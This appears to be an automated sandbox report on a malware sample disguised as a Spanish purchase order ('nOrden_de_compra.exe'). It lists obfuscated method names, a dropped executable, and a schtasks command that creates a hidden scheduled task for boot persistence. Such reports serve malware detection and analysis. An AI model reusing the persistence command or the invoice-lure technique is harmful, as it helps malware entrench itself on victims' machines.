                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.csHigh entropy of concatenated method names: 'NS3VNZtKb9', 'tQIVIx3a00', 'jvhVc0sdET', 'BdrVSkZhkC', 'xvdVCJjWvZ', 'uS2VM6infV', 'TgGVZrNLnY', 'cktV7SVccW', 'r8FVdLcM7d', 'MqbVFSVfq0'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, wnrE3F4a8RgEIeqXaee.csHigh entropy of concatenated method names: 'LyZnlp5N1j', 'EO3nOERWBZ', 'PfmnoZ7BrU', 'VxensYm7li', 'HgRnQ8BYyw', 'VjsnKnB0yF', 'S0onREy77Y', 'QR3n5CUn9E', 'MoGnqH6R4H', 'Gggniy6lRY'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, pGHbeS03tIufXepgXX.csHigh entropy of concatenated method names: 'En01brJmA6', 'Pu01thMwkD', 'iR91T8yUmc', 'aYl1mDsonm', 'piD19XPDYI', 'cQi1r1aesW', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, U9QAgVuaOBrXhXAvIx.csHigh entropy of concatenated method names: 'WvJn4PmfSx', 'b9dnVo0fH6', 'jwYneEvJhQ', 'SwSnIWksaR', 'vu4ncmBcj6', 'pVDnCHqkr1', 'nUcnMvBAli', 'ojq1vXiCtA', 'ObG1yCOmE6', 'X4P104GC0v'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, QamEXCqfkXltIZ5rPn.csHigh entropy of concatenated method names: 'M9oSsllAed', 'QRESKmWA0n', 'L2AS5ymeUl', 'QKkSqtogOo', 'FxhSjCXYWa', 'kxqSxpTdm8', 'GVBSYSXgoR', 'CqsS1sGSTA', 'z8HSnx93Fw', 'MjJSJ24CIR'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, R8McbU4p0CIa2MEB4H1.csHigh entropy of concatenated method names: 'INiJlS2nw2', 'fnlJOIGs6m', 'Rs4JoX7JUB', 'Ue37OZkOaklSOuDr8GZ', 'LSGP3QktNoquqxZfiMR', 'fh5fjQkmrgITS7wUtxB', 'inKkqskDCWmnGAQpK6n', 'oCaukYk9AaFALGt92yv'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, QQR1QDfeflhLhnewFd.csHigh entropy of concatenated method names: 'H8wZIQgwHn', 'u8LZSWd3xI', 'f7KZMGDXZp', 'A1xMuKevJD', 'KNlMzNskHn', 'UEHZaGdQPw', 'ceQZ4gVFj3', 'U5LZpo23m9', 'm8CZVlyrVJ', 'o5BZecfZl9'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, psEjOm9jBmrmsejYFy.csHigh entropy of concatenated method names: 'DNWjAPWNXF', 'CZPjL4am5R', 'Cpuj9Zu8Nc', 'XfejPoNS0d', 'ObOjtNymp6', 'mvrjTWcwQk', 'U1ljmIiuvv', 'h0BjrjZ2e0', 'ouGjgb8aXZ', 'YLAjfXSSyc'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, UesNoGyEPg1T0aorW0.csHigh entropy of concatenated method names: 'EZn1IyOX1J', 'ThZ1cePcUY', 'Bv71SFd03Q', 'CkO1CinpAj', 'oTV1M6yBd8', 'bPJ1ZaVjLK', 'tfK17apPuB', 'FUX1dHlOWU', 'QvV1FNnIZ7', 'nNs1UUY8rQ'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, uvbrjyBpB6IQ1sZIM7.csHigh entropy of concatenated method names: 'XmcYyCgEgh', 'bZIYu3Su7K', 'jf61a1NVEv', 'u6C14YvjuG', 'kNlYE4qxI5', 'JRXYLCW98e', 'QxFYDTPIir', 'Rx3Y9n5pwQ', 'xuAYPafBcj', 'uB1YW4M3rv'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, kp8qwk5XbcOdplPSn8.csHigh entropy of concatenated method names: 'jXUc9RKeh5', 'g5TcPbkMnS', 'sOxcWyVtaf', 'wkNc2hj4t6', 'XTRck4hGdf', 'vDCcBCZJOY', 'f5IcvBljxq', 't0ccy4RoQi', 'gS1c06YcH6', 'Vj6cuYtacJ'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, uDC5hthEYXnM7oO39Y.csHigh entropy of concatenated method names: 'dpjZlynISn', 'JZ6ZOhNRt1', 'YuTZoUvQnZ', 'XUfZsxCHNo', 'k55ZQMuMCv', 'li8ZKaBMSK', 'X8YZR8Ynwr', 'kXVZ5p05Ld', 'yHJZq8oKuw', 'sbjZinhRh6'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, xgm5voicFPk8sZLg9L.csHigh entropy of concatenated method names: 'XRaCQd1oIU', 'c4KCRk3TRG', 'E8uSTA8iTZ', 'mbySmwGEpL', 'Ox7SrfZTAy', 'cqSSgHpU7a', 'P6YSfeQbgM', 'PmNSHBJjrm', 'uVcShEQ3e0', 'xmxSAQaR1K'
                      Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, b4IOm7cKnfrLa3GBlb.csHigh entropy of concatenated method names: 'Dispose', 'nAs40YGSoZ', 'JVgptDd43p', 'hgfEE2TYlq', 'Uke4usNoGE', 'Rg14zT0aor', 'ProcessDialogKey', 'S0xpaGHbeS', 'vtIp4ufXep', 'KXXppB9QAg'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, qlDLMdzah6XGe81ZR4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pXwn8AxVdQ', 'cESnjDjyIt', 'UXunxURNEB', 'cqAnYwSAn5', 'cFXn1xIknu', 'SCnnnb8dse', 'knonJ3Uobt'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, OyOqeoeatmsG22RUyf.csHigh entropy of concatenated method names: 'JK74Zp8qwk', 'xbc47OdplP', 'ifk4FXltIZ', 'ErP4UnXgm5', 'jLg4j9L5Fc', 'WOW4xUDLkZ', 'u60HwKfUDb37IZVlHn', 'DrYVWGVS84EdjnPx01', 'nQN44tyf4V', 'Qjw4VVuUlL'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, M5tu5eScEBZf24uGb6.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Nynp0FqCwa', 'HHjpuVkpPt', 'gQppzx1Q4N', 'LCBVaOcCQP', 'DwJV4PxuYd', 'cZrVpMljnu', 'Xc7VVjpe1A', 'URQe9pssTfI53BD6l98'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, DFcyOWbUDLkZIX04JR.csHigh entropy of concatenated method names: 'BXnMNtI8DI', 'gbFMcPorB4', 'POoMCB0x07', 'oDNMZYEao4', 'tGBM7ZW2aZ', 'QPCCkSOuiw', 'zhZCBUn3tM', 'vjuCvT8ZL1', 'mOYCyTjkjS', 'opvC0gPN0C'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, dSPneu4Vjx6HTGfCEdG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WagJ9Nlr8b', 'u3QJP5YZQR', 'nFdJWjt40G', 'fQyJ2BNJGd', 'bQ7JkLwtH5', 'ULlJBjRCBx', 'D1wJvX5WjN'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, JSMvQGDlHAfTwMe3ZO.csHigh entropy of concatenated method names: 'RKF85RQHxR', 'xJs8qOVEqg', 'X048bi6C1U', 'QOR8tpwed8', 'rPV8mY4mGw', 'me48r4Fys1', 'WKS8f225l4', 'qdL8H5yIdc', 'HGo8AlYwI8', 'K3O8EUDBJE'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, cDToTJpHXBOUtdduer.csHigh entropy of concatenated method names: 'NOBoLeGHI', 'Q2Msr290T', 'HsEKEAcmK', 'pZKRCHrOw', 'jMFqmu74v', 'Xjji3YQsl', 'WM9m99eBqSRaCcgGHi', 'WbDeRUMry9pAMhQX3M', 'dya1Z95KQ', 'ld4J119X2'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, UYJYJc2aCln22jB6Dg.csHigh entropy of concatenated method names: 'oseYFbC1I2', 'mN3YU31JMy', 'ToString', 'NifYIGikQ0', 'W6xYcbNm3d', 'fHBYSpQpQs', 'MQOYCk0jM2', 'nkoYMoiOcK', 'xiaYZhCxcJ', 'cLgY7sE68f'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.csHigh entropy of concatenated method names: 'NS3VNZtKb9', 'tQIVIx3a00', 'jvhVc0sdET', 'BdrVSkZhkC', 'xvdVCJjWvZ', 'uS2VM6infV', 'TgGVZrNLnY', 'cktV7SVccW', 'r8FVdLcM7d', 'MqbVFSVfq0'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, wnrE3F4a8RgEIeqXaee.csHigh entropy of concatenated method names: 'LyZnlp5N1j', 'EO3nOERWBZ', 'PfmnoZ7BrU', 'VxensYm7li', 'HgRnQ8BYyw', 'VjsnKnB0yF', 'S0onREy77Y', 'QR3n5CUn9E', 'MoGnqH6R4H', 'Gggniy6lRY'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, pGHbeS03tIufXepgXX.csHigh entropy of concatenated method names: 'En01brJmA6', 'Pu01thMwkD', 'iR91T8yUmc', 'aYl1mDsonm', 'piD19XPDYI', 'cQi1r1aesW', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, U9QAgVuaOBrXhXAvIx.csHigh entropy of concatenated method names: 'WvJn4PmfSx', 'b9dnVo0fH6', 'jwYneEvJhQ', 'SwSnIWksaR', 'vu4ncmBcj6', 'pVDnCHqkr1', 'nUcnMvBAli', 'ojq1vXiCtA', 'ObG1yCOmE6', 'X4P104GC0v'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, QamEXCqfkXltIZ5rPn.csHigh entropy of concatenated method names: 'M9oSsllAed', 'QRESKmWA0n', 'L2AS5ymeUl', 'QKkSqtogOo', 'FxhSjCXYWa', 'kxqSxpTdm8', 'GVBSYSXgoR', 'CqsS1sGSTA', 'z8HSnx93Fw', 'MjJSJ24CIR'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, R8McbU4p0CIa2MEB4H1.csHigh entropy of concatenated method names: 'INiJlS2nw2', 'fnlJOIGs6m', 'Rs4JoX7JUB', 'Ue37OZkOaklSOuDr8GZ', 'LSGP3QktNoquqxZfiMR', 'fh5fjQkmrgITS7wUtxB', 'inKkqskDCWmnGAQpK6n', 'oCaukYk9AaFALGt92yv'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, QQR1QDfeflhLhnewFd.csHigh entropy of concatenated method names: 'H8wZIQgwHn', 'u8LZSWd3xI', 'f7KZMGDXZp', 'A1xMuKevJD', 'KNlMzNskHn', 'UEHZaGdQPw', 'ceQZ4gVFj3', 'U5LZpo23m9', 'm8CZVlyrVJ', 'o5BZecfZl9'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, psEjOm9jBmrmsejYFy.csHigh entropy of concatenated method names: 'DNWjAPWNXF', 'CZPjL4am5R', 'Cpuj9Zu8Nc', 'XfejPoNS0d', 'ObOjtNymp6', 'mvrjTWcwQk', 'U1ljmIiuvv', 'h0BjrjZ2e0', 'ouGjgb8aXZ', 'YLAjfXSSyc'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, UesNoGyEPg1T0aorW0.csHigh entropy of concatenated method names: 'EZn1IyOX1J', 'ThZ1cePcUY', 'Bv71SFd03Q', 'CkO1CinpAj', 'oTV1M6yBd8', 'bPJ1ZaVjLK', 'tfK17apPuB', 'FUX1dHlOWU', 'QvV1FNnIZ7', 'nNs1UUY8rQ'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, uvbrjyBpB6IQ1sZIM7.csHigh entropy of concatenated method names: 'XmcYyCgEgh', 'bZIYu3Su7K', 'jf61a1NVEv', 'u6C14YvjuG', 'kNlYE4qxI5', 'JRXYLCW98e', 'QxFYDTPIir', 'Rx3Y9n5pwQ', 'xuAYPafBcj', 'uB1YW4M3rv'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, kp8qwk5XbcOdplPSn8.csHigh entropy of concatenated method names: 'jXUc9RKeh5', 'g5TcPbkMnS', 'sOxcWyVtaf', 'wkNc2hj4t6', 'XTRck4hGdf', 'vDCcBCZJOY', 'f5IcvBljxq', 't0ccy4RoQi', 'gS1c06YcH6', 'Vj6cuYtacJ'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, uDC5hthEYXnM7oO39Y.csHigh entropy of concatenated method names: 'dpjZlynISn', 'JZ6ZOhNRt1', 'YuTZoUvQnZ', 'XUfZsxCHNo', 'k55ZQMuMCv', 'li8ZKaBMSK', 'X8YZR8Ynwr', 'kXVZ5p05Ld', 'yHJZq8oKuw', 'sbjZinhRh6'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, xgm5voicFPk8sZLg9L.csHigh entropy of concatenated method names: 'XRaCQd1oIU', 'c4KCRk3TRG', 'E8uSTA8iTZ', 'mbySmwGEpL', 'Ox7SrfZTAy', 'cqSSgHpU7a', 'P6YSfeQbgM', 'PmNSHBJjrm', 'uVcShEQ3e0', 'xmxSAQaR1K'
                      Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, b4IOm7cKnfrLa3GBlb.csHigh entropy of concatenated method names: 'Dispose', 'nAs40YGSoZ', 'JVgptDd43p', 'hgfEE2TYlq', 'Uke4usNoGE', 'Rg14zT0aor', 'ProcessDialogKey', 'S0xpaGHbeS', 'vtIp4ufXep', 'KXXppB9QAg'
                      Source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, SU.csHigh entropy of concatenated method names: 'G5s', 'RgtTUJcyZL', 's5u', 'g5f', 'Y5S', 't57', 'Xo0qQH', 'AF', 'tC', 'VE'
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeFile created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
